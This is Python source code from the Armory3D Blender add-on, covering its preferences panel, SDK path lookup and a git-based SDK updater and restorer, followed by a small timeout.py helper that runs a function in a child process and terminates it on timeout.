default=False) player_gapi_win: EnumProperty( items = [('direct3d11', 'Auto', 'direct3d11'), ('opengl', 'OpenGL', 'opengl'), ('direct3d11', 'Direct3D11', 'direct3d11')], name="Player Graphics API", default='direct3d11', description='Use this graphics API when launching the game in Krom player(F5)') player_gapi_linux: EnumProperty( items = [('opengl', 'Auto', 'opengl'), ('opengl', 'OpenGL', 'opengl')], name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)') player_gapi_mac: EnumProperty( items = [('opengl', 'Auto', 'opengl'), ('opengl', 'OpenGL', 'opengl')], name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)') code_editor: EnumProperty( items = [('kodestudio', 'Kode Studio', 'kodestudio'), ('default', 'System Default', 'default')], name="Code Editor", default='kodestudio', description='Use this editor for editing scripts') ui_scale: FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0) khamake_threads: IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1) renderdoc_path: StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="") ffmpeg_path: StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="") save_on_build: BoolProperty(name="Save on Build", description="Save .blend", default=False) legacy_shaders: BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False) relative_paths: BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False) viewport_controls: EnumProperty( items=[('qwerty', 'qwerty', 'qwerty'), ('azerty', 'azerty', 'azerty')], name="Viewport Controls", 
default='qwerty', description='Viewport camera mode controls') skip_update: BoolProperty(name="", default=False) def draw(self, context): self.skip_update = False layout = self.layout layout.label(text="Welcome to Armory! Click 'Save Preferences' at the bottom to keep Armory enabled.") p = bundled_sdk_path() if os.path.exists(p): layout.prop(self, "sdk_bundled") if not self.sdk_bundled: layout.prop(self, "sdk_path") else: layout.prop(self, "sdk_path") box = layout.box().column() box.label(text="Armory Updater") box.label(text="Note: Development version may run unstable!") row = box.row(align=True) row.alignment = 'EXPAND' row.operator("arm_addon.help", icon="URL") row.operator("arm_addon.update", icon="FILE_REFRESH") row.operator("arm_addon.restore") box.label(text="Check console for download progress. Please restart Blender after successful SDK update.") layout.prop(self, "show_advanced") if self.show_advanced: box = layout.box().column() box.prop(self, "player_gapi_" + get_os()) box.prop(self, "code_editor") box.prop(self, "renderdoc_path") box.prop(self, "ffmpeg_path") box.prop(self, "viewport_controls") box.prop(self, "ui_scale") box.prop(self, "khamake_threads") box.prop(self, "save_on_build") box.prop(self, "legacy_shaders") box.prop(self, "relative_paths") def bundled_sdk_path(): if get_os() == 'mac': # SDK on MacOS is located in .app folder due to security p = bpy.app.binary_path if p.endswith('Contents/MacOS/blender'): return p[:-len('Contents/MacOS/blender')] + '/armsdk/' else: return p[:-len('Contents/MacOS/./blender')] + '/armsdk/' elif get_os() == 'linux': # /blender return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/' else: # /blender.exe return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/' def get_fp(): if bpy.data.filepath == '': return '' s = bpy.data.filepath.split(os.path.sep) s.pop() return os.path.sep.join(s) def get_sdk_path(context): user_preferences = context.user_preferences addon_prefs = user_preferences.addons["armory"].preferences p = bundled_sdk_path() if os.path.exists(get_fp() + '/armsdk'): return get_fp() + '/armsdk' elif os.path.exists(p) and addon_prefs.sdk_bundled: return p else: return addon_prefs.sdk_path def remove_readonly(func, path, excinfo): os.chmod(path, stat.S_IWRITE) func(path) def run_proc(cmd, done): def fn(p, done): p.wait() if done != None: done() p = subprocess.Popen(cmd) threading.Thread(target=fn, args=(p, done)).start() return p def git_clone(done, p, gitn, n, recursive=False): if not os.path.exists(p + '/' + n + '_backup'): os.rename(p + '/' + n, p + '/' + n + '_backup') if os.path.exists(p + '/' + n): shutil.rmtree(p + '/' + n, onerror=remove_readonly) if recursive: run_proc(['git', 'clone', '--recursive', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1', '--shallow-submodules', '--jobs', '4'], done) else: run_proc(['git', 'clone', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1'], done) def restore_repo(p, n): if os.path.exists(p + '/' + n + '_backup'): if os.path.exists(p + '/' + n): shutil.rmtree(p + '/' + n, onerror=remove_readonly) os.rename(p + '/' + n + '_backup', p + '/' + n) class ArmAddonStartButton(bpy.types.Operator): '''Start Armory integration''' bl_idname = "arm_addon.start" bl_label = "Start" running = False def execute(self, context): sdk_path = get_sdk_path(context) if sdk_path == "": print("Configure Armory SDK path first") return {"CANCELLED"} scripts_path = sdk_path + "/armory/blender/" sys.path.append(scripts_path) local_sdk = os.path.exists(get_fp() + '/armsdk') 
import start start.register(local_sdk=local_sdk) ArmAddonStartButton.running = True return {"FINISHED"} class ArmAddonStopButton(bpy.types.Operator): '''Stop Armory integration''' bl_idname = "arm_addon.stop" bl_label = "Stop" def execute(self, context): import start start.unregister() ArmAddonStartButton.running = False return {"FINISHED"} class ArmAddonUpdateButton(bpy.types.Operator): '''Update Armory SDK''' bl_idname = "arm_addon.update" bl_label = "Update SDK" bl_description = "Update to the latest development version" def execute(self, context): sdk_path = get_sdk_path(context) if sdk_path == "": self.report({"ERROR"}, "Configure Armory SDK path first") return {"CANCELLED"} self.report({'INFO'}, 'Updating Armory SDK, check console for details.') print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories') os.chdir(sdk_path) global repos_updated global repos_total repos_updated = 0 repos_total = 9 def done(): global repos_updated global repos_total repos_updated += 1 if repos_updated == repos_total: print('Armory SDK updated, please restart Blender') git_clone(done, sdk_path, 'armory3d/armory', 'armory') git_clone(done, sdk_path, 'armory3d/iron', 'iron') git_clone(done, sdk_path, 'armory3d/haxebullet', 'lib/haxebullet') git_clone(done, sdk_path, 'armory3d/haxerecast', 'lib/haxerecast') git_clone(done, sdk_path, 'armory3d/zui', 'lib/zui') git_clone(done, sdk_path, 'armory3d/armory_tools', 'lib/armory_tools') git_clone(done, sdk_path, 'armory3d/iron_format', 'lib/iron_format') git_clone(done, sdk_path, 'armory3d/Krom_bin', 'Krom') git_clone(done, sdk_path, 'Kode/Kha', 'Kha', recursive=True) return {"FINISHED"} class ArmAddonRestoreButton(bpy.types.Operator): '''Update Armory SDK''' bl_idname = "arm_addon.restore" bl_label = "Restore SDK" bl_description = "Restore stable version" def execute(self, context): sdk_path = get_sdk_path(context) if sdk_path == "": self.report({"ERROR"}, "Configure Armory SDK path first") return {"CANCELLED"} os.chdir(sdk_path) restore_repo(sdk_path, 'armory') restore_repo(sdk_path, 'iron') restore_repo(sdk_path, 'lib/haxebullet') restore_repo(sdk_path, 'lib/haxerecast') restore_repo(sdk_path, 'lib/zui') restore_repo(sdk_path, 'lib/armory_tools') restore_repo(sdk_path, 'lib/iron_format') restore_repo(sdk_path, 'Kha') restore_repo(sdk_path, 'Krom') self.report({'INFO'}, 'Restored stable version') return {"FINISHED"} class ArmAddonHelpButton(bpy.types.Operator): '''Updater help''' bl_idname = "arm_addon.help" bl_label = "Help" bl_description = "Git is required for Armory Updater to work" def execute(self, context): webbrowser.open('https://armory3d.org/manual/#/dev/gitversion') return {"FINISHED"} @persistent def on_load_post(context): if ArmAddonStartButton.running: return bpy.ops.arm_addon.start() def register(): bpy.utils.register_class(ArmoryAddonPreferences) bpy.utils.register_class(ArmAddonStartButton) bpy.utils.register_class(ArmAddonStopButton) bpy.utils.register_class(ArmAddonUpdateButton) bpy.utils.register_class(ArmAddonRestoreButton) bpy.utils.register_class(ArmAddonHelpButton) bpy.app.handlers.load_post.append(on_load_post) def unregister(): bpy.ops.arm_addon.stop() bpy.utils.unregister_class(ArmoryAddonPreferences) bpy.utils.unregister_class(ArmAddonStartButton) bpy.utils.unregister_class(ArmAddonStopButton) bpy.utils.unregister_class(ArmAddonUpdateButton) bpy.utils.unregister_class(ArmAddonRestoreButton) bpy.utils.unregister_class(ArmAddonHelpButton) 
bpy.app.handlers.load_post.remove(on_load_post) if __name__ == "__main__": register()
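# --- Illustrative sketch (not part of the add-on) -------------------------------------
# Demonstrates the run_proc() pattern used by git_clone() above: spawn a subprocess and
# run a completion callback from a watcher thread once it exits. The command and the
# callback below are made up for the example.
def _example_run_proc_usage():
    done_event = threading.Event()

    def on_done():
        print("subprocess finished")
        done_event.set()

    run_proc(['git', '--version'], on_done)  # any short-lived command works here
    done_event.wait(timeout=30)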
timeout.py
import time
from multiprocessing import Process

# Note: this does not return the function's return value, only its exit status.
INTERVAL = 0.1


def run_with_timeout(timeout, fn, *args):
    """Run fn(*args) in a child process, terminating it if it exceeds `timeout` seconds."""

    def runner(fn, args):
        try:
            fn(*args)
        except Exception as e:
            print(e)
            raise

    # Because `runner` is defined locally, this relies on the 'fork' start method
    # (the default on Linux); under 'spawn' the target would need to be picklable.
    process = Process(target=runner, args=(fn, args))
    process.start()
    counter = 0
    while process.is_alive():
        time.sleep(INTERVAL)
        counter += 1
        if (counter * INTERVAL) > timeout:
            process.terminate()
            raise TimeoutError("Function timed out!")
    if process.exitcode != 0:
        raise RuntimeError("Test failed with exit code: %s" % process.exitcode)
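# Example usage (illustrative): the target function is defined at module level so the
# child process can run it; the slow call below is terminated after roughly one second.
def _example_sleepy(seconds):
    time.sleep(seconds)


if __name__ == "__main__":
    try:
        run_with_timeout(1.0, _example_sleepy, 5)
    except TimeoutError as exc:
        print(exc)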